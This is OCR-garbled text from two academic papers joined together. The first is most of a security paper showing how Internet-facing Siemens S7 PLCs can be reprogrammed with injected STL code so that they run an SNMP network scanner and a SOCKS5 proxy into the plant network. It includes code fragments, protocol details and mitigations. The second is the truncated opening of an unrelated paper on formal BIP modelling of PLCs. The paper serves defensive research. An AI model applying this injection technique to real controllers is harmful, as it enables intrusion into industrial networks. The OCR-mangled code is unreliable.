0.0 AND %10 .1) OR %10 .2; The graphical example needs the help of the STEP7. Inputs and outputs are positioned through drag & drop on the wire. New connections can be made on predefined positions by selecting the wire-tool from the toolbar above. Figure 3 shows the graphical representation of our example program. The following description can also be found in the Siemens manual delivered with the PLC [18]. The CPU has several registers used for execution and current state. For binary 526 Figure 3: Function block diagram example operations the status word register is important. All binary operations influence this register. The CPU uses for calculations up to four accumulator registers of 32 bits width. They are organized like a stack. It is possible to address independently each byte of the top register. Before a new value is loaded into the accumulator one the current value is copied to accumulator two. For adding two numbers the values have to be loaded successively into the accumulator register before the +0 operation is called. The result is written back into accumulator one. In STL the program would look like as following. L 2 L +D DW#16 #1 / / ACCU1 =l DW# 16#2 II ACCU1 =2,ACCU2 =1 / / ACCU1=ACCU1 +ACCU2 Code which is used multiple times in the program should be implemented as functions. These functions can be called from every point in the code. The CALL instruction allows to jump into the defined function. The necessary parameters are defined in the called function header and have to be specified below every CALL instruction. CALL FC1 VARI '- 1 VAR2 '-W#16 #A As mentioned earlier the only difference between function blocks and functions is a reference to the corresponding data block. In many cases the program needs storage which is assigned to a specific function to read constants or save process values. It is unusual to put constants direct in the code, because the code have to be recompiled after every change. In contrast data blocks can be manipulated easily even remotely. A function block call looks like as following. , CALL FB 1, o/cDB 1 VARI '- 1 VAR2 := W#16 #A Both function types can define different parameters: IN, OUT, IN_OUT, TEMP and RET_VAL. The FB STAT parameters are stored in its data block, which is passed as an additional argument. The TEMP type declares local variables which only are available in the function. The other types are self explanatory. E. Binary Representation of PLC Program Every code written in any language is compiled into MC7. The opcode length of MC7 instructions is variable and the encoding of parameters differs on many instructions. The Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) binary representation of the example program from the section before looks as following. 00100000 00110000 0112 0000 41100000 F Network Protocol A A o %IO .0 %10.1 %IO .2 o/t.QO.O The Siemens PLCs uses the proprietary S7Comm protocol for transferring blocks. It is a remote procedure call (RPC) protocol based on TCP/IP and ISO over TCP. Figure 4 illustrates the encapsulation of the protocols. The protocol provides the following functionality: System State List (SSL) request List available blocks Read/write data Block info request Up-/download block Transfer block into filesystem Start, stop and memory reset Debugging The executing of one of these function requires an initialized connection. After a regular TCP handshake the ISO over TCP setup is proceeded to negotiate the PDU size. In the S7Comm protocol the client has to provide additionally to his preferred PDU size the rack and slot of the CPU (see connection setup in figure 5). The CPU responses with its preferred PDU size and both agree to continue with the minimum of both values. After this initialization the client is able to invoke the functions on the CPU. Figure 5 shows the packet order of a download block function including the transfer into the filesystem. The PLC controls the download process after receiving the download request. The number of download block requests depends on the length of the block and the PDU size. The end is signaled with the download end request. The PLC waits after receiving the acknowledgement for further requests. Finally the transferred block should be persisted by calling the pIc control request. With the destination filesystem P as parameter the CPU stores the block and executes it. The upload process is similar. The engineering work station (EWS) requests for the upload of a specific block and waits for the acknowledgement. After receiving the acknowledgement without errors the EW S starts requesting the block. The responses contain the data of the block. The EWS repeats the procedure as long as the whole block is transferred. The end is signaled with an upload end request. The transferred blocks are structured and consists of header, data part and footer. The table I shows the structure of the known bytes. The footer contains information about the parameters used for calling the function. Not every byte of the header and footer are known well, but we have identified the necessary areas to understand the content. IV. AT TAC K DESCRIPT ION The search engine SHODAN shows that thousands of industrial control systems are direct accessible via the In ternet [8], [10]. As shown in chapter III it is possible to 527 Table I: Block structure, adopted from code [20] Description Bytes Offset Block signature 2 0 Block version I 2 Block attri bute 3 Block language 4 Block type I 5 Block number 2 6 Block length 4 8 Block password 4 12 Block last modified date 6 16 Block interface last modified date 6 22 Block interface length 2 28 Block Segment table length 2 30 Block local data length 2 32 Block data length 2 34 Data (Me7 / DB) x 36 Block signature I 36+x Block number 2 37+x Block interface length 2 39+x Block interface blocks count 2 41+x Block interface y 43+x download and upload the PLC program code. This enables attacker to manipulate the logic code of the PLCs that reads inputs and outputs. Furthermore the PLC offers a system library [21] which contains functions to establish arbitrary TCP/UDP communication. An attacker can use the full TCP/U DP support to scan the local production network behind the internet-facing PLC Furthermore he can leverage this PLC as a gateway to reach all the other production or network devices. Like Stuxnet we prepend the attacker's code to the existing logic code of the PLC The malicious code will be executed at the very beginning of OB I in addition to the normal control code. That is why the PLC will not be disturbed in its function. The easiest way is to download the OB I of Siemens PLCs and add a CALL instruction to an arbitrary function under our control, in our example a function called FC666. Then the patched OBI, FC666 and additional blocks will be uploaded to the PLC Figure 7 illustrates the code injection process. With the next execution cycle of the PLC the new uploaded program including the attacker's code will be executed without any kind of service disruption. This process enables the attacker to run any additional malicious code on the PLC With this paper we publish a tool called PLCinject that will automate this process [22]. Having this capabilities an attacker is able to execute the attack cycle as shown in figure 6. In step one the attacker injects a SNMP Scanner that runs in addition to the normal control code of the PLC After a full SNMP scan of the local network (step two) the attacker can download the scan results from the PLC (step three). The attacker has now an overview of the network behind the Internet-facing PLC The attacker removes the SNMP scanner and injects a SOCKS Proxy to the PLC logic program (step four). This enables the attacker to reach all PLCs in the local production network via the compromised PLC which acts as a SOCKS proxy. In the next two sections we are going to explain the implementation of the SNMP scanner and the SOCK S proxy . We will not explain every operation and system function in detail. For a complete description of those we refer to [18] and [21]. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) S7 Telegram Header I Params I Pardata I Data ISO over TCP TPKT I COTP S7 PDU TCPIIP I Header ISO TCP Telegram Figure 4: Packet encapsulation, adopted from [19] I EWS I I PLC I Connection Setup, PDU-Size:512 -- Connection Setup, PDU-Size:240 Download Request --- Download Request Ack -Downl oad Block Downlo ad Block Ack, (Data) --- Downl oad End Download End Ack PLC Control insert block into filesystem p --- -- PLC Control Ack Figure 5: Download block sequence diagram A, SNMP Scanner Siemens PLCs can not be used as a TCP port scanner because the used TCP connection function TCON cannot be aborted until the function has established an connection, Furthermore it is only possible to run eight TCP connection in parallel on a Siemens S7-300 PLC, Consequently the PLC is only able to perform a TCP scan until eight unsuccessful connection attempts occurred. This limitation do not apply to stateless UDP connections. That is why we use the UDP based Simple Network Management Protocol (SNMP). SNMP version 1 is defined in RFC 1157 [23] and was developed for monitoring and controlling network devices. A lot of network devices and most of the Siemens Simatic PLCs have SNMP enabled by default. Siemens PLCs are very communicative in case of enabled SNMP. By reading the SNMP sysDesc object with the 010 1.3.6.1.2.1.1.1, the Siemens PLC will transmit its product type, product model number, hardware and firmware version as shown in the following SNMP response: 528 Siemens, SlMATlC S7, CPU314C-2 PN/OP, 6ES7 314-6EH 04-0A BO , HW: 4, FW: V3.3.1 0. The system description is very useful for matching discovered PLCs against vulnerability and exploit databases. The firmware of PLCs is not very often patched. There are mainly two reasons: On the one hand a PLC firmware patch will interrupt the production process which causes a negative monetary impact. On the other hand a firmware patch of the PLC can lead to a loss of the production certification or other kind of quality assurance that is important for the customers of the manufacturing company. That is why the probability to find a Siemens PLC with a known vulnerability is very high. The SNMP scanner can be broken down into the following steps: 1) Get local IP and subnet 2) Calculate IPs of the subnet 3) Set up UDP connection 4) Send SNMP request 5) Receive SNMP responses 6) Save responses in a DB 7) Stop scanning and disconnect UDP connection As described in the chapter III the programming of a PLC is quite different from normal programming with e.g. the C language on a x86 system. Each PLC program is cyclically executed. That is it is needed save the state of the program after each step with condition variables. For reasons of comprehensibility we will only explain steps one to three. Figure 8 shows a code snippet of step one that calls the ROSYSST function. The ROSYSST function reads the internal System State List (SSL) of the Siemens PLC to obtain the PLC's local IP. SSL requests are normally used for diagnostic purposes. Line 14 and 15 will end the function in the case that the ROSYST function is busy. Figure 9 shows how the program calculates the first local IP. This is done by bitwise logic AND operation of the PLC's local IP address with its subnet mask, which returns the start address of the local network address range (line 24 -30). Now the SNMP scanner needs to know how often it must increment the IP address to cover the whole local subnet. Therefore we XOR the subnet mask with OxFFFFFFFF (line 35 -39). The result is the number of IP addresses in the subnet. Figure 10 shows how to set up an UDP connection in STL. At first we need to call the TCON function with special parameters in our TCON_P AR_SCAN data block. In case of UDP the TCON function does not set up a connection, this will only be done in the case of TCP because it is connection oriented in contrast to UDP. But calling the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 1O.0.0.3 .. -, ,- ".l \ ___ , , " ,\ )1 I Corporate I production "l " network , r", ', J _ ... 1O.0.0.3 (a) Attacker abuses the PLC to scan the local network for SNMP (b) Now he can use the PLC as a gateway into the local network devices Figure 6: Attack cycle OB 1 L1: II A AN A JNB CALL NOP ... 90Q124.0 90M72.1 90Q124.2 9OL20.0 L1 / FBI, 900B8 0 II (a) Original program. OB 1 / II CALL reset A AN A JNB CALL L1: NOP 0 I I ". FC666 registers 9OQ124.0 90M72 .1 9OQ124.2 90L20.0 /I Ll FBI, 900B8 I A A OPN A A A FB 1 9OI124.7 9OI124.6 Fe 666 OB666 900BX0.4 FB 1 90I124.7 90I124.6 (b) Patched program. The red blocks are added by PLCinject. Figure 7: Scheme of patching the PLCs program. ICON parameter once is not enough. The connection function will start to work when the #connect variable raises from o to 1 between two calls of the function. That is why we programmed a toggle function after the first appearance of the connect function (line 10 -11). This will change the 529 0001 get_ip : NOP 1 0002 0003 II read ip from system state list (SZL) 0004 CALL RDSYSST 0005 REQ SZL ID INDEX :=TRUE :=W#16#0037 :=W#16#0000 0006 0007 0008 0009 0010 0011 RET VA L :=#sysst_ret 0012 BUSY :=#syss t_busy SZL HEADER :="DB".szlheader.SZL HEADER DR :="DB".ip_info 0013 II wait until SZL read finish ed 0014 A #sysst_busy 0015 BEC 0016 0017 0018 SET S Figure 8: Get PLCs local IP #connect value from false to true after ICON has been called the first time in a cycle. The ICON function will detect a raising signal edge on its call in the next cycle and will then be executed. The next step is to send the UDP based SNMP packets and receive them. This will be done by calling the functions IUSEND and IURCV. After the SNMP scan has been completed all data will be stored in data block which can be downloaded by the attacker (step 3). B. SOCKS 5 Proxy Once the attacker has discovered all SNMP devices, in cluding the local PLCs, the next step is to connect to them. This can be accomplished by using the accessible PLC as a gateway into the local network. To achieve this we chose to implement a SOCKS 5 proxy on the PLC. This has two main reasons. At first the SOCKS protocol is quite lightweight and easy to implement. Furthermore all applications can use this Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0020 II calc first ip of local network 0021 II L "DB".ip_info .local ip 0022 OPN "DB" 0023 L %DBD406 002 4 II L "DB".ip_info .subnet 0025 L %DBD410 0026 AD 0027 II T "DB".ADDRESS .rem ip addr 002 8 T %DBD64 002 9 0030 I I 0031 I I 0032 0033 get number of hosts from subnet L "DB" .ip_info .subnet L %DBD4 10 L DW#16#FFFFFFFF 0034 XOD 0035 T #num hosts Figure 9: Calculate the local nets first IP and the maximal number of hosts 0001 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 CALL TCON , "T CON DB SCAN" AN - - REQ :=#connec t ID :=1 DONE :=#con done - BUSY :=#con _busy ERROR :=#con error - STATUS :=#con status - CONNECT :="DB".TCON #connected #connect PAR -SCAN Figure 10: Setup a UDP connection kind of proxy, either they are SOCKS aware and thus can be configured to use one or you use a so-called proxifier to add SOCKS support to arbitrary programs. The SOCKS 5 protocol is defined in RFC 1928 [24]. An error-free TCP connection to a target through the proxy consists of the following steps: 1) The client connects via TCP to the SOCK S server and sends a list of supported authentication methods. 2) The server replies with one selected authentication method. 3) Depending on the selected authentication method the appropriate sub-negotiation is entered. 4) The client sends a connect request with the targets IP. 5) The server sets up the connection and replies. All subsequent packets are tunneled between client and target. 6) The client closes the TCP connection. Our implementation offers the minimal necessary function ality. It supports no authentication, so we can skip step 3. Also we do not support proper error handling. In the end only TCP connects with IPv4 addresses are supported. Once the client connected, we expect this message flow: 1) Client offers authentication methods: any mes sage, typically Ox05 <authcount-n> (1 byte) <authlist> (n bytes). 2) Server chooses authentication method: 0 x 0 5 0 x 00 (perform no authentication). 530 0002 0003 0004 0005 0006 0007 0008 0009 0010 0011 0005 0006 0007 0008 0009 0010 0011 0012 0013 0014 0015 0016 0017 0018 0019 JL lend JU bind II state JU ne goti ate II state JU authenticate II state JU connect_request II state JU connect II state JU connect confirm II state JU proxy II state JU reset II state lend: JU end Figure 11: Jump list for the states of SOCKS 5 CALL TRCV , "T RCV_cl ient_DB" A AN AN JC EN R :=TRUE ID :=W#16#000 1 LEN :=0 NDR :=#rcv ndr BUSY :=#rcv_busy ERROR :=#rcv error STATUS RCVD LEN - DAT A :="buffe rs" .rev #rcv ndr - #rcv_busy #rcv error - next state -0 1 2 3 4 5 6 7 Figure 12: Receive the clients authentication negotiation 3) Client wants to connect to target: OxO 5 OxO 1 OxO 0 OxOl <ip> (4bytes) <port> (2 bytes). 4) Server confirms connection: OxO 5 OxO 0 OxO 0 OxOl OxOO OxOO OxOO OxOO OxOO OxOO. 5) Client and target can now conununicate through the connection with the server. As previously mentioned, programs on the PLC are cyclically executed. This is why we use a simple state machine to handle the SOCKS protocol. Therefore we number each state and use a jump list to execute the corresponding code block, see figure 11. A state transition is achieved by incrementing the state number which is persisted in a data block. It follows a description of each state and its actions: bind -On first start the program has to bind and listen to SOCKS port 1080. This is accomplished by using the system function TCON in passive mode. We stay in this state until a partner is connecting to this port. negot i ate -We wait until the client sends any message. This is done with the function TRCV which is enabled with the EN_R argument, see figure 12. aut hent icat e -After the first message we send a reply which indicates the client to perform no authentication. For this purpose we use the TSEND system function. In contrast to TRCV this function is edge controlled which means the parameter REQ has to change from FALSE to TRUE between consecutive calls to activate sending. As shown in figure 13 we toggle a flag and call TSEND twice with a rising edge on REQ. Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) 0008 CALL TSEND , "TSEND client DB" - 0009 REQ :=#authent icate 0010 ID :=W#16#000 1 0011 LEN :=2 0012 DONE :=#sn d done 0013 BUSY :=#sn d_busy 0014 ERROR :=#sn d error 0015 STATUS .= 0016 DAT A :="buffe rs".snd 0017 0018 AN #authen ticate 0019 S #authen ticate 0020 JC authenticate 002 1 0022 A #snd done 002 3 AN #snd erro r 002 4 AN #snd_busy 002 5 JC next state - Figure 13: Respond with no authentication necessary connect_request -Then we expect the client to send a connection set up message containing target IP and port number which is stored for the next state. connect -We set up the connection to the target with TCON. connect_confirm -When the connection to the target is established, we send the confirmation message to the client. proxy -Now we simply tunnel the connections between client and target. All data received from the client with TRCV is stored in a buffer which is reused to feed the TSENO function for sending data to the client. The same principle applies to the opposite direction, but we have to consider that sending messages can take a couple of cycles. Therefore a second buffer is used to ensure that no messages are mixed or lost. A disconnect is signaled with the error flag of TRCV. When this occurs we will send the last received data and then we go to the next state. reset -In this state we close all connections with TO I SCON and reset all persisted flags to its initial values. V. EVA LUATION We analyzed the differences of the execution cycle times of the following scenarios: (a) a simple control program as a baseline, (b) its malicious version with the prepended SOCKS proxy in idle mode and (c) under load. Idle mode means that the proxy has been added to the control code but no proxy connection has been established. The Baseline program copies bytewise the input memory to the output memory 20 times which results in 81920 copy instructions. For the measurement, we added small code snippets which store the last cycle time in a data block. Siemens PLCs store the time of last execution cycle in a local variable of OBI called OBl_PREV_CYCLE. We measured 2046 cycles in each scenario. All three scenarios do not exhibit normal distributions. We used the Kruskal-Wallis and the Dunn's Multiple Comparison Test for statistical significance analysis. The results are shown in Figure 14. Execution time differed significantly in all three scenarios. Table II shows the mean 531 95 *** *** *** 1/1 E .S: 90 Q) E .. J!! (,) 85 >- (J 80 e . rltGj Figure 14: Shows the data distribution of the measured scan cycles for the three scenarios. Data are represented as box plots with mean and were analyzed with the use of the Kruskal- Wallis test and the Dunn's Multiple Comparison Test. Significant differences are shown in the graph (p < 0.0001 =***). All data were statistically analyzed with Prism software, version 5.0 (Graph Pad Inc). Table II: Statistical analysis of the three scenarios Mean Sdt. Deviation Sdt. Error Baseline (ms) Proxy idle (ms) Proxy under load (ms) 85.32 0.4927 0.01089 85.40 0.5003 0.01106 86.67 0.5239 0.01158 difference of the Baseline and the Proxy under load program, which is only 1.35 ms. The maximum transfer rate of the SOCKS proxy prepended to the Baseline program was about 40 KE/s. If the SOCKS proxy runs alone on the PLC it is able to transfer up to 730 KE/s. All network measurements have used a direct 100 Mbitls Ethernet connection to the PLC. Finally, we tested the described attack cycle in our laboratory. In addition to regular traffic, we verified that we were able to tunnel an exploit for the DoS vulnerability CVE-2015-2177 via the SOCKS tunnel using the tsocks library. The exploit worked as expected via the SOCKS tunnel. VI. DISCU SSION Our attacks have limitations. In order to ensure that the PLC is always responsive, the execution time of the main program is monitored by a watchdog which kills the main program if the execution time becomes too long. The additional SNMP Scanner or Proxy code that we upload, together with the original program, should not exceed the overall maximum execution time of 150 ms. An injection of the scanner or proxy is unlikely to trigger this timeout because the mean additional execution time of the proxy under load is 1.35 ms which is small compared to 150 ms. Furthermore, time-outs can be avoided by resetting the time counter after the execution of the Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply. 1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) injected program with the system function RE_TRIGR [21]. The easiest way to mitigate the described attack is to keep the PLC offline or to use a virtual private network instead. If this is not possible protection-level 3 should be activated on the Siemens PLC This enables a password-based read and write protection for the PLC Without the right password the attacker can not modify the PLCs program. Based on our experience, this feature is rarely used in practice. Another applicable protection mechanism would be a firewall with deep packet inspection which is aware of industrial control protocols and thus can block potential malicious accesses such as attempts to reprogram the PLC VII. CO NCLUSION We have shown a new threat vector that enables an external attacker to leverage a PLC as a SNMP scanner and network gateway to the internal production network. This makes it possible to access control systems behind an Internet-facing PLC Our measurements indicate that the attack code, which runs de facto parallel to the original control program, causes a statistically significant but negligible increase of the execution cycle time. This makes a service disruption of the PLC unlikely and increases the chances that an attack remains undetected. Prior work on scanning the Internet for ICS only adressed risks due to control systems that are connected to the Internet directly . Our investigation shows that risks assessments must take PLCs into account that are connected only indirectly to the Internet. As a consequence, the target set of Internet-reachable industrial control systems is probably larger than expected and includes the "deep" industrial control network. RE FERENCES [I] S. Heng, "Industry 4.0 upgrading of germany's industrial capabilities on the horizon:' Deutsche Bank Research, 2014. [2] NIST , "CVE-2014-2908," Apr. 2014. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2908 [3] --, "CVE-2014-2246," Mar. 2014. [Online]. Available: https: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2014-2246 [4] --, "CVE-2012-3037," May 20l2. [Online]. Available: hups: Ilweb.n vd.nist.gov/view/vuln/detail?vulnld=CVE-2012-3037 [5] D. Beresford, "Exploiting Siemens Simatic S7 PLCs," Black Hat USA, 2011. [6] N. Cybersecurity and C. I. C. (NCC IC), "Ics-cert monitor," Sep. 2014. [7] Bundesamt fUr Sicherheit in der Informationstechnik, "Die Lage der IT-Sicherheit in Deutschland 2014," 2015. [8] Industrial Control Systems Cyber Emergency Response Team, "Alert (ICS-ALERT -l2-046-0 LA) Increasing Threat to Industrial Control Systems (Update A)," Available from ICS-CERT, ICS ALE RT-12-046-0lA., Oct. 20l2. [Online]. Available: hups: I lics- cert.us- cert.gov lalerts/ICS- ALERT- 12-046- 0 I A [9] J.-O. Malchow and J. Klick, Sicherheit in vernetzten Systemen: 21. DFN- Workshop. Paulsen, c., 2014, ch. Erreichbarkeit von digitalen Steuergeraten -ein Lagebild, pp. C2-CI9. [IO] B. Radvanovsky, "Project shine: 1,000,000 internet-connected scada and ics systems and counting," Tofino Security, 2013. [11] R. Langner. (2011) A time bomb with fourteen bytes. [Online]. Available: hUp:llwww.langner.comlen!20lll071 211a- ti me-bomb- with- fourteen- bytesl [12] B. Meixell and E. Forner, "Out of Control: Demonstrating SCADA Exploitation:' Black Hat USA, 2013. [13] S. E. McLaughlin, "On dynamic malware payloads aimed at pro grammable logic controllers." in HotSec, 20 II. 532 [14] S. McLaughlin and P. McDaniel, "Sabot: specification-based payload generation for programmable logic controllers," in Proceedings of the 2012 ACM coriference on Computer and communications security. ACM, 2012, pp. 439-449. [15] Wikipedia, "Automation Pyramid (content taken)." [Online]. Available: https:llde.wikipedia.org/wiki/Automatisierungspyramide [16] Siemens, "S7 314C- 2PN/DP Technical Details." [Online]. Available: https://support.industry.siemens.com /cs/pd/495261 ?pdti=td& pnid= 13754&lc=de- WW [17] -- , "S7-300 CPU 31xC and CPU 31x: Technical specifications." [Online]. Available: https:llcache.industry.siemens.com/dllfil es/906/12996906lau_70325/v II s7300_cpu_3 1xc_and_cpu_3 1 x_manuaCen- US_en-US.pdf [18] -- . (2011) S7-300 Instruction list S7-300 CPUs and ET 200 CPUs . [Online]. Available: https://cache.industry.siemens.com/dIlfiles/679/ 3 I 977679/atC8I 622/v lIs7300_parameter_manual_en- US_en- US.pdf [19] SNA P7, "S7 Protocol." [Online]. Available: http://snap7.sourceforge. netlsiemens_comm.html#s7 _protocol [20] J. Kiihner, "DotNe tSiemensPLCT oolBoxLibrary." [Online]. Available: https:llgithub.comljogibear9988/ DotN etSiemensPLCToolBoxLibrary [21] Siemens. (2006) System Software for S7-300/400 System and Standard Functions Volume 112. [Online]. Available: https:llcache.industry. siemens.com/dIlfiles/57 4/121457 4/atc 44504/v lISFC_e.pdf [22] D. Marzin, S. Lau, and J. Klick, "PLCinject Tool." [Online]. Available: https:llgit hub.comlSCADACS/P LCinject [23] J. Case, M. Fedor, M. Schoffstall, and J. Davin, "Simple Network Management Protocol (SN MP)," RFC 1157 (Historic), Internet Engineering Task Force, May 1990. [Online]. Available: http://www.ietf.orglrfc/rfcI157.txt [24] M. Leech, M. Ganis, Y. Lee, R. Kuris, D. Koblas, and L. Jones, "SOCKS Protocol Version 5," RFC 1928 (Proposed Standard), Internet Engineering Task Force, Mar. 1996. [Online]. Available: http://www.ietf.orglrfc/rfc 1928.txt Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:40:33 UTC from IEEE Xplore. Restrictions apply.
1 st Workshop on Security and Privacy in Cybermatics (SPiCy 2015) Internet-facing PLCs as a Network Backdoor Johannes Klick, Stephan Lau, Daniel Marzin, Jan-Ole Malchow, Volker Roth Freie Universitat Berlin -Secure Identity Research Group <first name>.<lastname> @fu-berlin.de
Formal_Modelling_of_PLC_Systems_by_BIP_Components.pdf
Programable logic controllers (PLCs) are complex embedded systems which are widely used in industry. The formal modeling of PLC system for veri cation is a rough task. Good veri cation model should be faithful with the system, and also should have suitable scale because of the state explosion problem of veri cation. This paper proposes an automatic framework for the construction of veri cation model of PLC systems. BIP (Behavior , Interaction, Priority) separates behavioral and architectural aspects in modelling. Speci cal PLC features and system architecture are modelled by BIP framework. They are universal for all PLC applications. We de ne the operational se- mantics of PLC instruction and present an automatic translation based modeling method for PLC software. A small example is demonstrated for our approach. I. I NTRODUCTION As embedded control systems are more and more complex, the safety of systems plays a critical role for high depend- ability. A tiny error may cause nancial losses or even cost human lives. Formal methods are an effective way to analyze and assure the reliability of complex systems. Programable logic controller (PLC), a typical control system is popular in industry. A PLC controls several processes concurrently. It receives input signals from sensors, processes them and produces control signals. Model checking has proved to be a powerful automatic veri cation technique [1]. It has been successfully applied to hardware design and communication protocol veri cation. In recent years, this technique has been used to verify certain type of software and achieved some success. Model checking process has three main steps. First the system is modeled as a Kripke structure. Then certain properties are expressed by temporal logic formulas. Model checking algorithm checks if the model satis es the required properties. If the property is not satis ed, an counterexample is provided. The critical precondition of veri cation is modelling. The International Electrotechnical Commission (IEC) pub- lished IEC61131 standard [2] for programmable controller. Five PLC program languages de ned by IEC are Instruction List (IL), Ladder Diagram(LD), Structured Test(ST), Function Block Diagram(FBD) and Sequential Function Chart(SFC). Most researches about PLC focus on IL programs. In [3], G. Canet et al. translate simple IL program into SMV input languages manually. The model is one cycle of the PLCexecution and he does not consider counters and integer type. R. Huuck uses abstract interpretation based static analysis to nd running errors in [4]. However, the model is static, only general properties can be checked. K. Loeis et al. [5] model the control systems cyclic behavior rst and then IL programs, they are integrated as one model. SMV is the veri cation tool. In order to nd an automatic translation to formal speci cation, mealy automaton [6] and XML [7] are used as medial format between programs and veri cation tool input. But the program should rstly be rewritten as IF-THEN- ELSE format. Petri net and timed automata are all used to model PLC programs. A PLC program translation tool is given in [8]. It translates IL programs to timed automata which can be checked by Uppaal [9]. The data types are restricted to Booleans and do not include function block calls. M. Heiner and T. Menzel de ne a Petri nets semantics of IL in [10]. But veri cation phase is not included. In [11], [12], Signal Interpreted Petri Net (SIPN) which extended Petri net with input and output signals are adopted to model PLC system. Such extension is powerful for modeling, but Petri net tool is not strong enough to analyze SIPN, they still have to use SMV . The methods presented above only consider software itself. The PLC environment and features of hardware platform are not mentioned . This paper presents a method of modeling PLC system for veri cation. The common parts of PLC hardware plat- form are modelled as BIP [13] components. Function call, interrupt heading and PLC cyclic mode are formalized by BIP synchronization with connectors. These parts are same for different PLC applications. We de ne the operational semantics of PLC instructions. The PLC software is formalized as a transition system according to operational semantics. An example is demonstrated for this modelling procedure. The paper is organized as follows. Section 12 introduces the BIP concepts and related tools. The modeling of PLC architecture and PLC features are shown in section III. Section IV de nes the operational semantics of PLC language and the translation based modeling method of software. In section V, we conclude the paper. 2013 IEEE 37th Annual Computer Software and Applications Conference 0730-3157/13 $26.00 2013 IEEE DOI 10.1109/COMPSAC.2013.85512 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. II. T HEBIP F RAMEWORK The BIP component framework is a formalism supporting rigorous design for heterogeneous component-based system- s [14]. It allows the description of systems as the composition of atomic components characterized by their behavior and their interfaces. It supports a system construction methodology based on the use of two families of composition operators: in- teractions and priorities. Components are composed by layered application of two operators. A. BIP Concepts In BIP , atomic components are nite-state automata extend- ed with variables and ports. V ariables are used to store local data. Ports are action names, and may be associated with variables. They are used for interaction with other components. States denote control locations at which the components await for interaction. A transition is labeled by a port, from a control location to another. It has associated a guard and an action, that are respectively, a Boolean condition and a computation de ned on local variables. In BIP , data and their transformations are written in C. Interactions describe synchronization constrains between ports of the composed components. Interactions are used to specify multiparty synchronization between components as the combination of two protocols: rendezvous which denotes strong symmetric synchronization and broadcast which ex- presses weak asymmetric synchronization. Interactions are de- ned using connectors. Connectors are sets of ports augmented with additional information . Every interaction has a guard and an action. The action can be an update function, operating on data associated to ports participating in the interaction. Priorities between interactions are used to restrict nonde- terminism inherent to parallel systems. They are particularly useful to model scheduling policies. When the transition condition holds and two interactions are enabled, then only the high priority interaction is allowed for execution. In practise, priorities steer system evolution. B. BIP T ools The BIP framework is concretely implemented by the BIP language and an extensible toolbox [15]. The toolbox provides front-end tools for editing and parsing of BIP programs, as well as for generating an intermediate model, followed by code generation (in C++). Intermediate models can be subject to various model transformations focusing on construction of optimized models for respectively sequential [16] and distributed execution [17]. It provides also back-end tools in- cluding runtime for analysis (through simulation) and ef cient execution on particular platforms. The toolbox provides a ded- icated modelling language for describing BIP component and connector. The BIP language leverages on C-style variables and date type declarations, expressions and statements. It also provides additional structural syntactic constructs for de n- ing component behavior, specifying the coordination through connectors. Moreover it proposes mechanism for parametric descriptions. So it can de ne type and instance.Program execuation Input phase Output phase Fig. 1. PLC Operation Mode V alidation of BIP models can be achieved by using static or runtime validation techniques. The static validation tech- niques are supported by the D-Finder tool [18]. The runtime validation technique of BIP is based on construction and execution of monitored systems. Monitors are atomic compo- nents presenting safety requirements. If safety properties are violated, monitors move to error state. BIP framework provide native support for building and running executable models for monitored systems. III. F ORMALIZA TION OF PLC F EATURES This section proposes the modelling framework for com- plicated software hardware mixed system. The execution of software is highly related with the hardware and the envi- ronment. So we should model the speci cal features of PLC systems. These models are common parts of the different PLC applications. A. F ormalization of Cyclical Operation Mode PLC runs in a cyclical way of three stages which is shown in g.1. At the input phase, it scans signals from the sensors and stores them in the input registers. Then the instructions in memory are read out and executed. The results are stored in the output registers at the second stage. All data in the output registers will be sent to actuators in output phase. In view of that operation mode, two kinds of models can be extracted. One model at a higher level of extraction ignores the operation details, which is easy to analyze and verify. The other one considers the cyclical operation mode through a scheduling component, which displays the read-in, operation and read-out of data. The cyclic scheduler component is shown in Fig.2. It comprises two states. At the beginning, it transmits from the initial state IDLE to the EXE state, synchronizing with the environment and PLC main program through startCyc . The EXE state indicates the execution of PLC. After a delay of CycleTime which signi es the cycle time, the component moves back to the IDLE state through a synchronization port finCyc . That is all for a PLC cycle. Such an explicit model shows the details of the implementation in a cycle. And due to the lower abstraction, we obtain models of a larger scale. B. F ormalization of Interrupt scheduler Interrupt is a vital feature of PLC. If an interrupt happens, the running program switches to handle it and returns to the original program when nished. PLC admits kinds of inter- rupts, such as external I/O interrupt, communication interrupt, and time base interrupt. They have different priorities, and 513 Authorized licensed use limited to: Air Force Institute of Technology. Downloaded on February 11,2025 at 16:43:07 UTC from IEEE Xplore. Restrictions apply. IDLEstartCyc finCycstartCyc ticktime=0 ticktime>CycleTime, finCycticktime<=CycleTime tick ticktime++ tickEXE Fig. 2. BIP model of cyclical scheduler PREint ret pre start finEXEfinPriStack=empty retid PriStackint PriStack.push(id) startINITpre id=PriStack.pop() int PriStack.push(id)Rea Fig. 3. BIP model of interrupt scheduler the communication interrupt has the top priority. According to the principle of rst-come rst-service, a running interrupt is not allowed to interrupt for most PLCs. Until the running one nished, another interrupt of highest priority is chosen to execute from interrupt queue. Since the cycle time of PLC is short as tens of milliseconds, in general, interrupts are judged periodically and 